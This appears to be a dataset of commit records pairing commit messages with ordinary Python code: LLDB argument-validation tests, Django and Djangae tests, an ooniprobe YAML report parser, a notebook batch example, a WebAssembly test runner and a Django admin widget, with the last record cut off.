[lldb][NFC] Add test for invalid expression command args
git-svn-id: 4c4cc70b1ef44ba2b7963015e681894188cea27e@370618 91177308-0d34-0410-b5e6-96231b3b80d8
|
import lldb
from lldbsuite.test.lldbtest import *
from lldbsuite.test.decorators import *
class InvalidArgsExpressionTestCase(TestBase):
mydir = TestBase.compute_mydir(__file__)
def setUp(self):
TestBase.setUp(self)
@no_debug_info_test
def test_invalid_lang(self):
self.expect("expression -l foo --", error=True,
substrs=["error: unknown language type: 'foo' for expression"])
@no_debug_info_test
def test_invalid_all_thread(self):
self.expect("expression -a foo --", error=True,
substrs=['error: invalid all-threads value setting: "foo"'])
@no_debug_info_test
def test_invalid_ignore_br(self):
self.expect("expression -i foo --", error=True,
substrs=['error: could not convert "foo" to a boolean value.'])
@no_debug_info_test
def test_invalid_allow_jit(self):
self.expect("expression -j foo --", error=True,
substrs=['error: could not convert "foo" to a boolean value.'])
@no_debug_info_test
def test_invalid_timeout(self):
self.expect("expression -t foo --", error=True,
substrs=['error: invalid timeout setting "foo"'])
self.expect("expression -t \"\" --", error=True,
substrs=['error: invalid timeout setting ""'])
@no_debug_info_test
def test_invalid_unwind(self):
self.expect("expression -u foo --", error=True,
substrs=['error: could not convert "foo" to a boolean value.'])
@no_debug_info_test
def test_invalid_fixits(self):
self.expect("expression -X foo --", error=True,
substrs=['error: could not convert "foo" to a boolean value.'])
|
<commit_before><commit_msg>[lldb][NFC] Add test for invalid expression command args
git-svn-id: 4c4cc70b1ef44ba2b7963015e681894188cea27e@370618 91177308-0d34-0410-b5e6-96231b3b80d8<commit_after>
|
import lldb
from lldbsuite.test.lldbtest import *
from lldbsuite.test.decorators import *
class InvalidArgsExpressionTestCase(TestBase):
mydir = TestBase.compute_mydir(__file__)
def setUp(self):
TestBase.setUp(self)
@no_debug_info_test
def test_invalid_lang(self):
self.expect("expression -l foo --", error=True,
substrs=["error: unknown language type: 'foo' for expression"])
@no_debug_info_test
def test_invalid_all_thread(self):
self.expect("expression -a foo --", error=True,
substrs=['error: invalid all-threads value setting: "foo"'])
@no_debug_info_test
def test_invalid_ignore_br(self):
self.expect("expression -i foo --", error=True,
substrs=['error: could not convert "foo" to a boolean value.'])
@no_debug_info_test
def test_invalid_allow_jit(self):
self.expect("expression -j foo --", error=True,
substrs=['error: could not convert "foo" to a boolean value.'])
@no_debug_info_test
def test_invalid_timeout(self):
self.expect("expression -t foo --", error=True,
substrs=['error: invalid timeout setting "foo"'])
self.expect("expression -t \"\" --", error=True,
substrs=['error: invalid timeout setting ""'])
@no_debug_info_test
def test_invalid_unwind(self):
self.expect("expression -u foo --", error=True,
substrs=['error: could not convert "foo" to a boolean value.'])
@no_debug_info_test
def test_invalid_fixits(self):
self.expect("expression -X foo --", error=True,
substrs=['error: could not convert "foo" to a boolean value.'])
|
[lldb][NFC] Add test for invalid expression command args
git-svn-id: 4c4cc70b1ef44ba2b7963015e681894188cea27e@370618 91177308-0d34-0410-b5e6-96231b3b80d8import lldb
from lldbsuite.test.lldbtest import *
from lldbsuite.test.decorators import *
class InvalidArgsExpressionTestCase(TestBase):
mydir = TestBase.compute_mydir(__file__)
def setUp(self):
TestBase.setUp(self)
@no_debug_info_test
def test_invalid_lang(self):
self.expect("expression -l foo --", error=True,
substrs=["error: unknown language type: 'foo' for expression"])
@no_debug_info_test
def test_invalid_all_thread(self):
self.expect("expression -a foo --", error=True,
substrs=['error: invalid all-threads value setting: "foo"'])
@no_debug_info_test
def test_invalid_ignore_br(self):
self.expect("expression -i foo --", error=True,
substrs=['error: could not convert "foo" to a boolean value.'])
@no_debug_info_test
def test_invalid_allow_jit(self):
self.expect("expression -j foo --", error=True,
substrs=['error: could not convert "foo" to a boolean value.'])
@no_debug_info_test
def test_invalid_timeout(self):
self.expect("expression -t foo --", error=True,
substrs=['error: invalid timeout setting "foo"'])
self.expect("expression -t \"\" --", error=True,
substrs=['error: invalid timeout setting ""'])
@no_debug_info_test
def test_invalid_unwind(self):
self.expect("expression -u foo --", error=True,
substrs=['error: could not convert "foo" to a boolean value.'])
@no_debug_info_test
def test_invalid_fixits(self):
self.expect("expression -X foo --", error=True,
substrs=['error: could not convert "foo" to a boolean value.'])
|
<commit_before><commit_msg>[lldb][NFC] Add test for invalid expression command args
git-svn-id: 4c4cc70b1ef44ba2b7963015e681894188cea27e@370618 91177308-0d34-0410-b5e6-96231b3b80d8<commit_after>import lldb
from lldbsuite.test.lldbtest import *
from lldbsuite.test.decorators import *
class InvalidArgsExpressionTestCase(TestBase):
mydir = TestBase.compute_mydir(__file__)
def setUp(self):
TestBase.setUp(self)
@no_debug_info_test
def test_invalid_lang(self):
self.expect("expression -l foo --", error=True,
substrs=["error: unknown language type: 'foo' for expression"])
@no_debug_info_test
def test_invalid_all_thread(self):
self.expect("expression -a foo --", error=True,
substrs=['error: invalid all-threads value setting: "foo"'])
@no_debug_info_test
def test_invalid_ignore_br(self):
self.expect("expression -i foo --", error=True,
substrs=['error: could not convert "foo" to a boolean value.'])
@no_debug_info_test
def test_invalid_allow_jit(self):
self.expect("expression -j foo --", error=True,
substrs=['error: could not convert "foo" to a boolean value.'])
@no_debug_info_test
def test_invalid_timeout(self):
self.expect("expression -t foo --", error=True,
substrs=['error: invalid timeout setting "foo"'])
self.expect("expression -t \"\" --", error=True,
substrs=['error: invalid timeout setting ""'])
@no_debug_info_test
def test_invalid_unwind(self):
self.expect("expression -u foo --", error=True,
substrs=['error: could not convert "foo" to a boolean value.'])
@no_debug_info_test
def test_invalid_fixits(self):
self.expect("expression -X foo --", error=True,
substrs=['error: could not convert "foo" to a boolean value.'])
|
|
4c39c3785499bd9973007bd6ad9044a28accd063
|
djangae/tests/test_mail.py
|
djangae/tests/test_mail.py
|
# THIRD PARTY
from django.core.mail import send_mail
from django.test import override_settings
from google.appengine.api.app_identity import get_application_id
# DJANGAE
from djangae.contrib import sleuth
from djangae.test import TestCase
class EmailBackendTests(TestCase):
def _get_valid_sender_address(self):
""" Return an email address which will be allowed as a 'from' address for the current App
Engine app.
"""
return "example@%s.appspotmail.com" % get_application_id()
@override_settings(EMAIL_BACKEND='djangae.mail.EmailBackend')
def test_send_email(self):
""" Test that sending an email using Django results in the email being sent through App
Engine.
"""
with sleuth.watch('djangae.mail.aeemail.EmailMessage.send') as gae_send:
send_mail("Subject", "Hello", self._get_valid_sender_address(), ["1@example.com"])
self.assertTrue(gae_send.called)
@override_settings(EMAIL_BACKEND='djangae.mail.AsyncEmailBackend')
def test_send_email_deferred(self):
""" Test that sending an email using Django results in the email being sent through App
Engine.
"""
with sleuth.watch('djangae.mail.aeemail.EmailMessage.send') as gae_send:
send_mail("Subject", "Hello", self._get_valid_sender_address(), ["1@example.com"])
self.process_task_queues()
self.assertTrue(gae_send.called)
|
Add some basic tests for the Djangae email backends.
|
Add some basic tests for the Djangae email backends.
|
Python
|
bsd-3-clause
|
potatolondon/djangae,potatolondon/djangae,grzes/djangae,grzes/djangae,grzes/djangae
|
Add some basic tests for the Djangae email backends.
|
# THIRD PARTY
from django.core.mail import send_mail
from django.test import override_settings
from google.appengine.api.app_identity import get_application_id
# DJANGAE
from djangae.contrib import sleuth
from djangae.test import TestCase
class EmailBackendTests(TestCase):
def _get_valid_sender_address(self):
""" Return an email address which will be allowed as a 'from' address for the current App
Engine app.
"""
return "example@%s.appspotmail.com" % get_application_id()
@override_settings(EMAIL_BACKEND='djangae.mail.EmailBackend')
def test_send_email(self):
""" Test that sending an email using Django results in the email being sent through App
Engine.
"""
with sleuth.watch('djangae.mail.aeemail.EmailMessage.send') as gae_send:
send_mail("Subject", "Hello", self._get_valid_sender_address(), ["1@example.com"])
self.assertTrue(gae_send.called)
@override_settings(EMAIL_BACKEND='djangae.mail.AsyncEmailBackend')
def test_send_email_deferred(self):
""" Test that sending an email using Django results in the email being sent through App
Engine.
"""
with sleuth.watch('djangae.mail.aeemail.EmailMessage.send') as gae_send:
send_mail("Subject", "Hello", self._get_valid_sender_address(), ["1@example.com"])
self.process_task_queues()
self.assertTrue(gae_send.called)
|
<commit_before><commit_msg>Add some basic tests for the Djangae email backends.<commit_after>
|
# THIRD PARTY
from django.core.mail import send_mail
from django.test import override_settings
from google.appengine.api.app_identity import get_application_id
# DJANGAE
from djangae.contrib import sleuth
from djangae.test import TestCase
class EmailBackendTests(TestCase):
def _get_valid_sender_address(self):
""" Return an email address which will be allowed as a 'from' address for the current App
Engine app.
"""
return "example@%s.appspotmail.com" % get_application_id()
@override_settings(EMAIL_BACKEND='djangae.mail.EmailBackend')
def test_send_email(self):
""" Test that sending an email using Django results in the email being sent through App
Engine.
"""
with sleuth.watch('djangae.mail.aeemail.EmailMessage.send') as gae_send:
send_mail("Subject", "Hello", self._get_valid_sender_address(), ["1@example.com"])
self.assertTrue(gae_send.called)
@override_settings(EMAIL_BACKEND='djangae.mail.AsyncEmailBackend')
def test_send_email_deferred(self):
""" Test that sending an email using Django results in the email being sent through App
Engine.
"""
with sleuth.watch('djangae.mail.aeemail.EmailMessage.send') as gae_send:
send_mail("Subject", "Hello", self._get_valid_sender_address(), ["1@example.com"])
self.process_task_queues()
self.assertTrue(gae_send.called)
|
Add some basic tests for the Djangae email backends.# THIRD PARTY
from django.core.mail import send_mail
from django.test import override_settings
from google.appengine.api.app_identity import get_application_id
# DJANGAE
from djangae.contrib import sleuth
from djangae.test import TestCase
class EmailBackendTests(TestCase):
def _get_valid_sender_address(self):
""" Return an email address which will be allowed as a 'from' address for the current App
Engine app.
"""
return "example@%s.appspotmail.com" % get_application_id()
@override_settings(EMAIL_BACKEND='djangae.mail.EmailBackend')
def test_send_email(self):
""" Test that sending an email using Django results in the email being sent through App
Engine.
"""
with sleuth.watch('djangae.mail.aeemail.EmailMessage.send') as gae_send:
send_mail("Subject", "Hello", self._get_valid_sender_address(), ["1@example.com"])
self.assertTrue(gae_send.called)
@override_settings(EMAIL_BACKEND='djangae.mail.AsyncEmailBackend')
def test_send_email_deferred(self):
""" Test that sending an email using Django results in the email being sent through App
Engine.
"""
with sleuth.watch('djangae.mail.aeemail.EmailMessage.send') as gae_send:
send_mail("Subject", "Hello", self._get_valid_sender_address(), ["1@example.com"])
self.process_task_queues()
self.assertTrue(gae_send.called)
|
<commit_before><commit_msg>Add some basic tests for the Djangae email backends.<commit_after># THIRD PARTY
from django.core.mail import send_mail
from django.test import override_settings
from google.appengine.api.app_identity import get_application_id
# DJANGAE
from djangae.contrib import sleuth
from djangae.test import TestCase
class EmailBackendTests(TestCase):
def _get_valid_sender_address(self):
""" Return an email address which will be allowed as a 'from' address for the current App
Engine app.
"""
return "example@%s.appspotmail.com" % get_application_id()
@override_settings(EMAIL_BACKEND='djangae.mail.EmailBackend')
def test_send_email(self):
""" Test that sending an email using Django results in the email being sent through App
Engine.
"""
with sleuth.watch('djangae.mail.aeemail.EmailMessage.send') as gae_send:
send_mail("Subject", "Hello", self._get_valid_sender_address(), ["1@example.com"])
self.assertTrue(gae_send.called)
@override_settings(EMAIL_BACKEND='djangae.mail.AsyncEmailBackend')
def test_send_email_deferred(self):
""" Test that sending an email using Django results in the email being sent through App
Engine.
"""
with sleuth.watch('djangae.mail.aeemail.EmailMessage.send') as gae_send:
send_mail("Subject", "Hello", self._get_valid_sender_address(), ["1@example.com"])
self.process_task_queues()
self.assertTrue(gae_send.called)
|
|
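The sleuth.watch helper used above wraps a dotted-path callable and records whether it was invoked; a minimal sketch of the same pattern outside a test case:

from djangae.contrib import sleuth

with sleuth.watch('djangae.mail.aeemail.EmailMessage.send') as watched:
    pass  # code that might send mail would run here
print(watched.called)  # False here, since nothing sent mail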
fc338d9095299ad5394ff92c6a50a50af960d3f2
|
genome_designer/variants/tests/test_materialized_view_manager.py
|
genome_designer/variants/tests/test_materialized_view_manager.py
|
"""
Tests for materialized_view_manager.py.
"""
from django.test import TestCase
from variants.materialized_view_manager import MATERIALIZED_TABLE_QUERYABLE_FIELDS_MAP
class TestMaterializedViewSchema(TestCase):
def test_queryable_fields_map(self):
"""Make sure the schema builds without errors.
"""
# Just check one of them and make sure it worked.
position_schema = MATERIALIZED_TABLE_QUERYABLE_FIELDS_MAP['position']
self.assertEquals(position_schema['type'], 'Integer')
|
Add test that goes with last commit.
|
Add test that goes with last commit.
|
Python
|
mit
|
woodymit/millstone,churchlab/millstone,churchlab/millstone,woodymit/millstone,woodymit/millstone,woodymit/millstone_accidental_source,woodymit/millstone,woodymit/millstone_accidental_source,churchlab/millstone,churchlab/millstone,woodymit/millstone_accidental_source,woodymit/millstone_accidental_source
|
Add test that goes with last commit.
|
"""
Tests for materialized_view_manager.py.
"""
from django.test import TestCase
from variants.materialized_view_manager import MATERIALIZED_TABLE_QUERYABLE_FIELDS_MAP
class TestMaterializedViewSchema(TestCase):
def test_queryable_fields_map(self):
"""Make sure the schema builds without errors.
"""
# Just check one of them and make sure it worked.
position_schema = MATERIALIZED_TABLE_QUERYABLE_FIELDS_MAP['position']
self.assertEquals(position_schema['type'], 'Integer')
|
<commit_before><commit_msg>Add test that goes with last commit.<commit_after>
|
"""
Tests for materialized_view_manager.py.
"""
from django.test import TestCase
from variants.materialized_view_manager import MATERIALIZED_TABLE_QUERYABLE_FIELDS_MAP
class TestMaterializedViewSchema(TestCase):
def test_queryable_fields_map(self):
"""Make sure the schema builds without errors.
"""
# Just check one of them and make sure it worked.
position_schema = MATERIALIZED_TABLE_QUERYABLE_FIELDS_MAP['position']
self.assertEquals(position_schema['type'], 'Integer')
|
Add test that goes with last commit."""
Tests for materialized_view_manager.py.
"""
from django.test import TestCase
from variants.materialized_view_manager import MATERIALIZED_TABLE_QUERYABLE_FIELDS_MAP
class TestMaterializedViewSchema(TestCase):
def test_queryable_fields_map(self):
"""Make sure the schema builds without errors.
"""
# Just check one of them and make sure it worked.
position_schema = MATERIALIZED_TABLE_QUERYABLE_FIELDS_MAP['position']
self.assertEquals(position_schema['type'], 'Integer')
|
<commit_before><commit_msg>Add test that goes with last commit.<commit_after>"""
Tests for materialized_view_manager.py.
"""
from django.test import TestCase
from variants.materialized_view_manager import MATERIALIZED_TABLE_QUERYABLE_FIELDS_MAP
class TestMaterializedViewSchema(TestCase):
def test_queryable_fields_map(self):
"""Make sure the schema builds without errors.
"""
# Just check one of them and make sure it worked.
position_schema = MATERIALIZED_TABLE_QUERYABLE_FIELDS_MAP['position']
self.assertEquals(position_schema['type'], 'Integer')
|
|
83b0a8e394f281ac41abe0be52c7560e285e0967
|
scripts/example_parser.py
|
scripts/example_parser.py
|
# This is an example of how to parse ooniprobe reports
import yaml
import sys
print "Opening %s" % sys.argv[1]
f = open(sys.argv[1])
yamloo = yaml.safe_load_all(f)
report_header = yamloo.next()
print "ASN: %s" % report_header['probe_asn']
print "CC: %s" % report_header['probe_cc']
print "IP: %s" % report_header['probe_ip']
print "Start Time: %s" % report_header['start_time']
print "Test name: %s" % report_header['test_name']
print "Test version: %s" % report_header['test_version']
for report_entry in yamloo:
print "Test: %s" % report_entry['test']
print "Input: %s" % report_entry['input']
print "Report: %s" % report_entry['report']
f.close()
|
Add a very simple example on how to securely parse the ooniprobe reports
|
Add a very simple example on how to securely parse the ooniprobe reports
|
Python
|
bsd-2-clause
|
Karthikeyan-kkk/ooni-probe,juga0/ooni-probe,lordappsec/ooni-probe,juga0/ooni-probe,kdmurray91/ooni-probe,Karthikeyan-kkk/ooni-probe,Karthikeyan-kkk/ooni-probe,lordappsec/ooni-probe,kdmurray91/ooni-probe,0xPoly/ooni-probe,lordappsec/ooni-probe,0xPoly/ooni-probe,juga0/ooni-probe,kdmurray91/ooni-probe,0xPoly/ooni-probe,0xPoly/ooni-probe,lordappsec/ooni-probe,juga0/ooni-probe,Karthikeyan-kkk/ooni-probe,kdmurray91/ooni-probe
|
Add a very simple example on how to securely parse the ooniprobe reports
|
# This is an example of how to parse ooniprobe reports
import yaml
import sys
print "Opening %s" % sys.argv[1]
f = open(sys.argv[1])
yamloo = yaml.safe_load_all(f)
report_header = yamloo.next()
print "ASN: %s" % report_header['probe_asn']
print "CC: %s" % report_header['probe_cc']
print "IP: %s" % report_header['probe_ip']
print "Start Time: %s" % report_header['start_time']
print "Test name: %s" % report_header['test_name']
print "Test version: %s" % report_header['test_version']
for report_entry in yamloo:
print "Test: %s" % report_entry['test']
print "Input: %s" % report_entry['input']
print "Report: %s" % report_entry['report']
f.close()
|
<commit_before><commit_msg>Add a very simple example on how to securely parse the ooniprobe reports<commit_after>
|
# This is an example of how to parse ooniprobe reports
import yaml
import sys
print "Opening %s" % sys.argv[1]
f = open(sys.argv[1])
yamloo = yaml.safe_load_all(f)
report_header = yamloo.next()
print "ASN: %s" % report_header['probe_asn']
print "CC: %s" % report_header['probe_cc']
print "IP: %s" % report_header['probe_ip']
print "Start Time: %s" % report_header['start_time']
print "Test name: %s" % report_header['test_name']
print "Test version: %s" % report_header['test_version']
for report_entry in yamloo:
print "Test: %s" % report_entry['test']
print "Input: %s" % report_entry['input']
print "Report: %s" % report_entry['report']
f.close()
|
Add a very simple example on how to securely parse the ooniprobe reports# This is an example of how to parse ooniprobe reports
import yaml
import sys
print "Opening %s" % sys.argv[1]
f = open(sys.argv[1])
yamloo = yaml.safe_load_all(f)
report_header = yamloo.next()
print "ASN: %s" % report_header['probe_asn']
print "CC: %s" % report_header['probe_cc']
print "IP: %s" % report_header['probe_ip']
print "Start Time: %s" % report_header['start_time']
print "Test name: %s" % report_header['test_name']
print "Test version: %s" % report_header['test_version']
for report_entry in yamloo:
print "Test: %s" % report_entry['test']
print "Input: %s" % report_entry['input']
print "Report: %s" % report_entry['report']
f.close()
|
<commit_before><commit_msg>Add a very simple example on how to securely parse the ooniprobe reports<commit_after># This is an example of how to parse ooniprobe reports
import yaml
import sys
print "Opening %s" % sys.argv[1]
f = open(sys.argv[1])
yamloo = yaml.safe_load_all(f)
report_header = yamloo.next()
print "ASN: %s" % report_header['probe_asn']
print "CC: %s" % report_header['probe_cc']
print "IP: %s" % report_header['probe_ip']
print "Start Time: %s" % report_header['start_time']
print "Test name: %s" % report_header['test_name']
print "Test version: %s" % report_header['test_version']
for report_entry in yamloo:
print "Test: %s" % report_entry['test']
print "Input: %s" % report_entry['input']
print "Report: %s" % report_entry['report']
f.close()
|
|
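The key detail above is that a report is a stream of YAML documents rather than one document; a compact restatement of the pattern (Python 2, matching the script; 'report.yamloo' is a placeholder filename):

import yaml

with open('report.yamloo') as f:
    docs = yaml.safe_load_all(f)   # lazy generator over YAML documents
    header = docs.next()           # first document is the report header
    entries = list(docs)           # the rest are individual test entries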
88e61467702e517d0db4ae11d584bcde0b7b0366
|
batch_eg.py
|
batch_eg.py
|
"""Example of using nbparameterise API to substitute variables in 'batch mode'
"""
from nbparameterise import code
from IPython.nbformat import current as nbformat
from IPython.nbconvert.preprocessors.execute import ExecutePreprocessor
from IPython.nbconvert.exporters.notebook import NotebookExporter
from IPython.nbconvert.writers import FilesWriter
stock_names = ['YHOO', 'MSFT', 'GOOG']
with open("Stock display.ipynb") as f:
nb = nbformat.read(f, 'ipynb')
definitions = code.extract_cell1_definitions(nb)
for name in stock_names:
print("Rendering for stock", name)
defined = []
for inp in definitions:
if inp.name =='stock':
# Fill in the current value
defined.append(inp.with_value(name))
else:
defined.append(inp)
code.replace_definitions(nb, defined)
# Run
resources = {}
nb, resources = ExecutePreprocessor().preprocess(nb, resources)
# Save
output, resources = NotebookExporter().from_notebook_node(nb, resources)
nbname = "Stock display %s" % name
FilesWriter().write(output, resources, notebook_name=nbname)
|
Add example of using API in batch mode
|
Add example of using API in batch mode
|
Python
|
mit
|
takluyver/nbparameterise
|
Add example of using API in batch mode
|
"""Example of using nbparameterise API to substitute variables in 'batch mode'
"""
from nbparameterise import code
from IPython.nbformat import current as nbformat
from IPython.nbconvert.preprocessors.execute import ExecutePreprocessor
from IPython.nbconvert.exporters.notebook import NotebookExporter
from IPython.nbconvert.writers import FilesWriter
stock_names = ['YHOO', 'MSFT', 'GOOG']
with open("Stock display.ipynb") as f:
nb = nbformat.read(f, 'ipynb')
definitions = code.extract_cell1_definitions(nb)
for name in stock_names:
print("Rendering for stock", name)
defined = []
for inp in definitions:
if inp.name =='stock':
# Fill in the current value
defined.append(inp.with_value(name))
else:
defined.append(inp)
code.replace_definitions(nb, defined)
# Run
resources = {}
nb, resources = ExecutePreprocessor().preprocess(nb, resources)
# Save
output, resources = NotebookExporter().from_notebook_node(nb, resources)
nbname = "Stock display %s" % name
FilesWriter().write(output, resources, notebook_name=nbname)
|
<commit_before><commit_msg>Add example of using API in batch mode<commit_after>
|
"""Example of using nbparameterise API to substitute variables in 'batch mode'
"""
from nbparameterise import code
from IPython.nbformat import current as nbformat
from IPython.nbconvert.preprocessors.execute import ExecutePreprocessor
from IPython.nbconvert.exporters.notebook import NotebookExporter
from IPython.nbconvert.writers import FilesWriter
stock_names = ['YHOO', 'MSFT', 'GOOG']
with open("Stock display.ipynb") as f:
nb = nbformat.read(f, 'ipynb')
definitions = code.extract_cell1_definitions(nb)
for name in stock_names:
print("Rendering for stock", name)
defined = []
for inp in definitions:
if inp.name =='stock':
# Fill in the current value
defined.append(inp.with_value(name))
else:
defined.append(inp)
code.replace_definitions(nb, defined)
# Run
resources = {}
nb, resources = ExecutePreprocessor().preprocess(nb, resources)
# Save
output, resources = NotebookExporter().from_notebook_node(nb, resources)
nbname = "Stock display %s" % name
FilesWriter().write(output, resources, notebook_name=nbname)
|
Add example of using API in batch mode"""Example of using nbparameterise API to substitute variables in 'batch mode'
"""
from nbparameterise import code
from IPython.nbformat import current as nbformat
from IPython.nbconvert.preprocessors.execute import ExecutePreprocessor
from IPython.nbconvert.exporters.notebook import NotebookExporter
from IPython.nbconvert.writers import FilesWriter
stock_names = ['YHOO', 'MSFT', 'GOOG']
with open("Stock display.ipynb") as f:
nb = nbformat.read(f, 'ipynb')
definitions = code.extract_cell1_definitions(nb)
for name in stock_names:
print("Rendering for stock", name)
defined = []
for inp in definitions:
if inp.name == 'stock':
# Fill in the current value
defined.append(inp.with_value(name))
else:
defined.append(inp)
code.replace_definitions(nb, defined)
# Run
resources = {}
nb, resources = ExecutePreprocessor().preprocess(nb, resources)
# Save
output, resources = NotebookExporter().from_notebook_node(nb, resources)
nbname = "Stock display %s" % name
FilesWriter().write(output, resources, notebook_name=nbname)
|
<commit_before><commit_msg>Add example of using API in batch mode<commit_after>"""Example of using nbparameterise API to substitute variables in 'batch mode'
"""
from nbparameterise import code
from IPython.nbformat import current as nbformat
from IPython.nbconvert.preprocessors.execute import ExecutePreprocessor
from IPython.nbconvert.exporters.notebook import NotebookExporter
from IPython.nbconvert.writers import FilesWriter
stock_names = ['YHOO', 'MSFT', 'GOOG']
with open("Stock display.ipynb") as f:
nb = nbformat.read(f, 'ipynb')
definitions = code.extract_cell1_definitions(nb)
for name in stock_names:
print("Rendering for stock", name)
defined = []
for inp in definitions:
if inp.name == 'stock':
# Fill in the current value
defined.append(inp.with_value(name))
else:
defined.append(inp)
code.replace_definitions(nb, defined)
# Run
resources = {}
nb, resources = ExecutePreprocessor().preprocess(nb, resources)
# Save
output, resources = NotebookExporter().from_notebook_node(nb, resources)
nbname = "Stock display %s" % name
FilesWriter().write(output, resources, notebook_name=nbname)
|
|
b560ac3bacab29c22ea1ed9ddc698d918e39e0dd
|
ml-proto/runtests.py
|
ml-proto/runtests.py
|
#!/usr/bin/env python
import os.path
import unittest
import subprocess
import glob
class RunTests(unittest.TestCase):
def _runTestFile(self, shortName, fileName):
absRunner = os.path.abspath("src/main.native")
print("\n// %s" % shortName)
exitCode = subprocess.call([absRunner, fileName])
self.assertEqual(0, exitCode, "test runner failed with exit code %i" % exitCode)
def generate_test_cases(cls, files):
for fileName in files:
absFileName = os.path.abspath(fileName)
attrName = fileName
# bind the current loop values via default arguments so each test runs its own file
testCase = lambda self, name=attrName, path=absFileName: self._runTestFile(name, path)
setattr(cls, attrName, testCase)
if __name__ == "__main__":
generate_test_cases(RunTests, glob.glob("test/*.wasm"))
unittest.main()
|
Add a simple automated test runner for all the .wasm files in the test directory
|
Add a simple automated test runner for all the .wasm files in the test directory
|
Python
|
apache-2.0
|
kg/spec,pjuftring/spec,maurer/spec,binji/spec,AndrewScheidecker/WebAssembly-spec,AugustusHuang/spec,incrediblesound/spec,eminemix/spec,marianoguerra/spec,naturaltransformation/spec,binji/spec,marianoguerra/spec,AndrewScheidecker/WebAssembly-spec,m4b/spec,d3spis3d/spec,AugustusHuang/spec,lindig/spec,maurer/spec,naturaltransformation/spec,Acidburn0zzz/spec,lindig/spec,Acidburn0zzz/spec,incrediblesound/spec,kg/spec,d3spis3d/spec,pjuftring/spec
|
Add a simple automated test runner for all the .wasm files in the test directory
|
#!/usr/bin/env python
import os.path
import unittest
import subprocess
import glob
class RunTests(unittest.TestCase):
def _runTestFile(self, shortName, fileName):
absRunner = os.path.abspath("src/main.native")
print("\n// %s" % shortName)
exitCode = subprocess.call([absRunner, fileName])
self.assertEqual(0, exitCode, "test runner failed with exit code %i" % exitCode)
def generate_test_cases(cls, files):
for fileName in files:
absFileName = os.path.abspath(fileName)
attrName = fileName
# bind the current loop values via default arguments so each test runs its own file
testCase = lambda self, name=attrName, path=absFileName: self._runTestFile(name, path)
setattr(cls, attrName, testCase)
if __name__ == "__main__":
generate_test_cases(RunTests, glob.glob("test/*.wasm"))
unittest.main()
|
<commit_before><commit_msg>Add a simple automated test runner for all the .wasm files in the test directory<commit_after>
|
#!/usr/bin/env python
import os.path
import unittest
import subprocess
import glob
class RunTests(unittest.TestCase):
def _runTestFile(self, shortName, fileName):
absRunner = os.path.abspath("src/main.native")
print("\n// %s" % shortName)
exitCode = subprocess.call([absRunner, fileName])
self.assertEqual(0, exitCode, "test runner failed with exit code %i" % exitCode)
def generate_test_cases(cls, files):
for fileName in files:
absFileName = os.path.abspath(fileName)
attrName = fileName
# bind the current loop values via default arguments so each test runs its own file
testCase = lambda self, name=attrName, path=absFileName: self._runTestFile(name, path)
setattr(cls, attrName, testCase)
if __name__ == "__main__":
generate_test_cases(RunTests, glob.glob("test/*.wasm"))
unittest.main()
|
Add a simple automated test runner for all the .wasm files in the test directory#!/usr/bin/env python
import os.path
import unittest
import subprocess
import glob
class RunTests(unittest.TestCase):
def _runTestFile(self, shortName, fileName):
absRunner = os.path.abspath("src/main.native")
print("\n// %s" % shortName)
exitCode = subprocess.call([absRunner, fileName])
self.assertEqual(0, exitCode, "test runner failed with exit code %i" % exitCode)
def generate_test_cases(cls, files):
for fileName in files:
absFileName = os.path.abspath(fileName)
attrName = fileName
# bind the current loop values via default arguments so each test runs its own file
testCase = lambda self, name=attrName, path=absFileName: self._runTestFile(name, path)
setattr(cls, attrName, testCase)
if __name__ == "__main__":
generate_test_cases(RunTests, glob.glob("test/*.wasm"))
unittest.main()
|
<commit_before><commit_msg>Add a simple automated test runner for all the .wasm files in the test directory<commit_after>#!/usr/bin/env python
import os.path
import unittest
import subprocess
import glob
class RunTests(unittest.TestCase):
def _runTestFile(self, shortName, fileName):
absRunner = os.path.abspath("src/main.native")
print("\n// %s" % shortName)
exitCode = subprocess.call([absRunner, fileName])
self.assertEqual(0, exitCode, "test runner failed with exit code %i" % exitCode)
def generate_test_cases(cls, files):
for fileName in files:
absFileName = os.path.abspath(fileName)
attrName = fileName
# bind the current loop values via default arguments so each test runs its own file
testCase = lambda self, name=attrName, path=absFileName: self._runTestFile(name, path)
setattr(cls, attrName, testCase)
if __name__ == "__main__":
generate_test_cases(RunTests, glob.glob("test/*.wasm"))
unittest.main()
|
|
332def912a107c2e8d281c3101f32cc5e846bc17
|
massmedia/widgets.py
|
massmedia/widgets.py
|
from django.utils.text import truncate_words
from django.contrib.admin.widgets import ForeignKeyRawIdWidget
class ForeignKeyRawIdImageWidget(ForeignKeyRawIdWidget):
"""
A Widget for displaying ForeignKeys in the "raw_id" interface and a thumbnail
rather than in a <select> box.
"""
def label_for_value(self, value):
key = self.rel.get_related_field().name
obj = self.rel.to._default_manager.get(**{key: value})
return ' <strong>%s</strong> %s' % (truncate_words(obj, 14), obj.thumb())
|
Add a rawIdImageWidget that can easily be used in admin. This widget will display a thumbnail of the selected image.
|
Add a rawIdImageWidget that can easily be used in admin. This widget will display a thumbnail of the selected image.
|
Python
|
apache-2.0
|
uclastudentmedia/django-massmedia,uclastudentmedia/django-massmedia
|
Add a rawIdImageWidget that can easily be used in admin. This widget will display a thumbnail of the selected image.
|
from django.utils.text import truncate_words
from django.contrib.admin.widgets import ForeignKeyRawIdWidget
class ForeignKeyRawIdImageWidget(ForeignKeyRawIdWidget):
"""
A Widget for displaying ForeignKeys in the "raw_id" interface and a thumbnail
rather than in a <select> box.
"""
def label_for_value(self, value):
key = self.rel.get_related_field().name
obj = self.rel.to._default_manager.get(**{key: value})
return ' <strong>%s</strong> %s' % (truncate_words(obj, 14), obj.thumb())
|
<commit_before><commit_msg>Add a rawIdImageWidget that can easily be used in admin. This widget will display a thumbnail of the selected image.<commit_after>
|
from django.utils.text import truncate_words
from django.contrib.admin.widgets import ForeignKeyRawIdWidget
class ForeignKeyRawIdImageWidget(ForeignKeyRawIdWidget):
"""
A Widget for displaying ForeignKeys in the "raw_id" interface and a thumbnail
rather than in a <select> box.
"""
def label_for_value(self, value):
key = self.rel.get_related_field().name
obj = self.rel.to._default_manager.get(**{key: value})
return ' <strong>%s</strong> %s' % (truncate_words(obj, 14), obj.thumb())
|
Add a rawIdImageWidget that can easily be used in admin. This widget will display a thumbnail of the selected image.from django.utils.text import truncate_words
from django.contrib.admin.widgets import ForeignKeyRawIdWidget
class ForeignKeyRawIdImageWidget(ForeignKeyRawIdWidget):
"""
A Widget for displaying ForeignKeys in the "raw_id" interface and a thumbnail
rather than in a <select> box.
"""
def label_for_value(self, value):
key = self.rel.get_related_field().name
